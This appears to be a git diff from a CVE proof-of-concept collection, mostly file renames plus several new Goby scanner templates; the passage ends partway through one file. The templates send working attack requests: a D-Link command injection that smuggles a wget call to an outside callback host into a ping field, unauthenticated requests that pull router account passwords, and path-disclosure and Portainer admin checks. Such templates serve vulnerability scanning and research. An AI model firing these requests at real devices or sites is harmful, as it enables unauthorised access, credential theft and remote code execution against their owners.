diff --git a/2010/CVE-2010-2861/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2010/CVE-2010-2861/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/nuclei/wait_to_be_added
diff --git a/2014/CVE-2014-3120/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2014/CVE-2014-3120/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/oneliner/wait_to_be_added
diff --git a/2014/CVE-2014-4210/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/others/wait_to_be_added
similarity index 100%
rename from 2014/CVE-2014-4210/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/others/wait_to_be_added
diff --git a/2015/CVE-2015-1427/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2015/CVE-2015-1427/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/pocsuite2/wait_to_be_added
diff --git a/2017/CVE-2017-12635/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2017/CVE-2017-12635/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/pocsuite3/wait_to_be_added
diff --git a/2018/CVE-2018-6910/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/xray/wait_to_be_added
similarity index 100%
rename from 2018/CVE-2018-6910/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/xray/wait_to_be_added
diff --git a/2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yaml b/2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yml
similarity index 100%
rename from 2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yaml
rename to 2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yml
diff --git a/2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yaml b/2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yml
similarity index 100%
rename from 2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yaml
rename to 2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yml
diff --git a/2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yaml b/2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yml
similarity index 100%
rename from 2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yaml
rename to 2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yml
diff --git a/2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yaml b/2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yml
similarity index 100%
rename from 2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yaml
rename to 2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yml
diff --git a/2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yaml b/2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yml
similarity index 100%
rename from 2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yaml
rename to 2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yml
diff --git a/2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yaml b/2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yml
similarity index 100%
rename from 2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yaml
rename to 2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yml
diff --git a/2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yaml b/2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yml
similarity index 100%
rename from 2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yaml
rename to 2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yml
diff --git a/2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yaml b/2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yml
similarity index 100%
rename from 2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yaml
rename to 2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yml
diff --git a/2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yaml b/2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yml
similarity index 100%
rename from 2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yaml
rename to 2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yml
diff --git a/2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yaml b/2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yml
similarity index 100%
rename from 2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yaml
rename to 2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yml
diff --git a/2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yaml b/2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yml
similarity index 100%
rename from 2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yaml
rename to 2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yml
diff --git a/2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yaml b/2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yml
similarity index 100%
rename from 2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yaml
rename to 2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yml
diff --git a/2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yaml b/2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yml
similarity index 100%
rename from 2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yaml
rename to 2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yml
diff --git a/2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yaml b/2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yml
similarity index 100%
rename from 2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yaml
rename to 2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yml
diff --git a/2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yaml b/2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yml
similarity index 100%
rename from 2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yaml
rename to 2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yml
diff --git a/2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yaml b/2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yml
similarity index 100%
rename from 2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yaml
rename to 2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yml
diff --git a/2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yaml b/2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yml
similarity index 100%
rename from 2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yaml
rename to 2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yml
diff --git a/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json b/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json
new file mode 100644
index 000000000..bdaebfaf4
--- /dev/null
+++ b/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json
@@ -0,0 +1,44 @@
+{
+ "Name": "Portainer为创建用户导致未授权访问(CVE-2018-19367)",
+ "Level": "2",
+ "Tags": [],
+ "GobyQuery": "title=Portainer",
+ "Description": "Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。",
+ "Product": "Portainer",
+ "Homepage": "https://portainer.io/",
+ "Author": "k3vi_07@icloud.com",
+ "Impact": "Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://github.com/lichti/shodan-portainer/"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/users/admin/check",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "404",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-03-20 12:49:52",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
diff --git a/2018/CVE-2018-7662/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2018/CVE-2018-7662/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/nuclei/wait_to_be_added
diff --git a/2019/CVE-2019-16313/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-16313/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/oneliner/wait_to_be_added
diff --git a/2019/CVE-2019-16920/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/others/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-16920/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/others/wait_to_be_added
diff --git a/2019/CVE-2019-17506/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-17506/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/pocsuite2/wait_to_be_added
diff --git a/2020/CVE-2020-11991/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-11991/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/pocsuite3/wait_to_be_added
diff --git a/2020/CVE-2020-13937/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/xray/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-13937/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/xray/wait_to_be_added
diff --git a/2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yaml b/2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yml
similarity index 100%
rename from 2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yaml
rename to 2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yml
diff --git a/2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yaml b/2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yml
similarity index 100%
rename from 2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yaml
rename to 2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yml
diff --git a/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json b/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json
new file mode 100644
index 000000000..e53d65f5d
--- /dev/null
+++ b/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json
@@ -0,0 +1,74 @@
+{
+ "Name": "DedeCMS InfoLeak CVE-2018-6910",
+ "Level": "1",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "app=\"DedeCMS\"",
+ "Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。",
+ "Product": "DedeCMS",
+ "Homepage": "http://www.dedecms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/include/downmix.inc.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "downmix.inc.php",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Call to undefined function helper()",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-14 16:43:48",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yaml b/2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yml
similarity index 100%
rename from 2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yaml
rename to 2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yml
diff --git a/2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yaml b/2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yml
similarity index 100%
rename from 2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yaml
rename to 2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yml
diff --git a/2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yaml b/2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yml
similarity index 100%
rename from 2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yaml
rename to 2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yml
diff --git a/2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yaml b/2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yml
similarity index 100%
rename from 2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yaml
rename to 2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yml
diff --git a/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json b/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json
new file mode 100644
index 000000000..b397c84c3
--- /dev/null
+++ b/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json
@@ -0,0 +1,108 @@
+{
+ "Name": "Couch CMS Infoleak CVE-2018-7662",
+ "Level": "3",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "(title=\"CouchCMS\" | body=\"Powered by CouchCMS\")",
+ "Description": "Couch through 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php",
+ "Product": "Couch cms",
+ "Homepage": "https://www.couchcms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/includes/mysql2i/mysql2i.func.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "mysql2i.func.php on line 10",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error: Cannot redeclare mysql_affected_rows() in",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/addons/phpmailer/phpmailer.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "phpmailer.php on line 10",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error: Call to a menber function add_event_listener() on a non-object in",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-09 19:56:42",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yaml b/2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yml
similarity index 100%
rename from 2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yaml
rename to 2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yml
diff --git a/2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yaml b/2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yml
similarity index 100%
rename from 2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yaml
rename to 2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yml
diff --git a/2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yaml b/2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yml
similarity index 100%
rename from 2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yaml
rename to 2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yml
diff --git a/2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yaml b/2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yml
similarity index 100%
rename from 2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yaml
rename to 2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yml
diff --git a/2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yaml b/2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yml
similarity index 100%
rename from 2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yaml
rename to 2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yml
diff --git a/2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yaml b/2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yml
similarity index 100%
rename from 2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yaml
rename to 2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yml
diff --git a/2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yaml b/2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yml
similarity index 100%
rename from 2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yaml
rename to 2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yml
diff --git a/2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yaml b/2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yml
similarity index 100%
rename from 2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yaml
rename to 2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yml
diff --git a/2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yaml b/2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yml
similarity index 100%
rename from 2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yaml
rename to 2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yml
diff --git a/2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yaml b/2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yml
similarity index 100%
rename from 2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yaml
rename to 2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yml
diff --git a/2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yaml b/2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yml
similarity index 100%
rename from 2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yaml
rename to 2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yml
diff --git a/2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yaml b/2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yml
similarity index 100%
rename from 2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yaml
rename to 2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yml
diff --git a/2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yaml b/2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yml
similarity index 100%
rename from 2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yaml
rename to 2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yml
diff --git "a/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json" "b/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json"
new file mode 100644
index 000000000..f2f4667a3
--- /dev/null
+++ "b/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json"
@@ -0,0 +1,70 @@
+{
+ "Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313",
+ "Level": "2",
+ "Tags": [
+ "账号密码泄露"
+ ],
+ "GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")",
+ "Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器",
+ "Product": "蜂网互联企业级路由器v4.31",
+ "Homepage": "http://www.ifw8.cn/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/action/usermanager.htm",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "pwd",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/action/usermanager.htm",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-02-21 11:22:17",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yaml b/2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yml
similarity index 100%
rename from 2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yaml
rename to 2019/CVE-2019-16313/poc/xray/CVE-2019-16313.yml
diff --git a/2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yaml b/2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yml
similarity index 100%
rename from 2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yaml
rename to 2019/CVE-2019-16663/poc/xray/CVE-2019-16663.yml
diff --git a/2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yaml b/2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yml
similarity index 100%
rename from 2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yaml
rename to 2019/CVE-2019-16759/poc/xray/CVE-2019-16759.yml
diff --git a/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json b/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json
new file mode 100644
index 000000000..b00ccfb13
--- /dev/null
+++ b/2019/CVE-2019-16920/poc/goby/CVE-2019-16920.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Dlink RCE CVE-2019-16920",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(app=\"D_Link-Router\" | body=\"DIR-655\" | body=\"DIR-866L\" | body=\"DIR-652\" | body=\"DHP-1565\")",
+ "Description": "Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.",
+ "Product": "Dlink",
+ "Homepage": "http://www.dlink.com.cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://www.anquanke.com/post/id/187923"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/apply_sec.cgi",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://{{{check}}}",
+ "set_variable": [
+ "check|dnslog|4|15"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$reserver",
+ "operation": "contains",
+ "value": "{{{check}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-25 18:14:25",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yaml b/2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yml
similarity index 100%
rename from 2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yaml
rename to 2019/CVE-2019-16920/poc/xray/CVE-2019-16920.yml
diff --git a/2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yaml b/2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yml
similarity index 100%
rename from 2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yaml
rename to 2019/CVE-2019-16996/poc/xray/CVE-2019-16996.yml
diff --git a/2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yaml b/2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yml
similarity index 100%
rename from 2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yaml
rename to 2019/CVE-2019-16997/poc/xray/CVE-2019-16997.yml
diff --git a/2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yaml b/2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yml
similarity index 100%
rename from 2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yaml
rename to 2019/CVE-2019-17418/poc/xray/CVE-2019-17418.yml
diff --git a/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json b/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json
new file mode 100644
index 000000000..91466ccbf
--- /dev/null
+++ b/2019/CVE-2019-17506/poc/goby/CVE-2019-17506.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Dlink Info Leak CVE-2019-17506",
+ "Level": "2",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "app=\"D_Link-Router\"",
+ "Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.",
+ "Product": "Dlink",
+ "Homepage": " http://www.dlink.com.cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://xz.aliyun.com/t/6453"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/getcfg.php",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
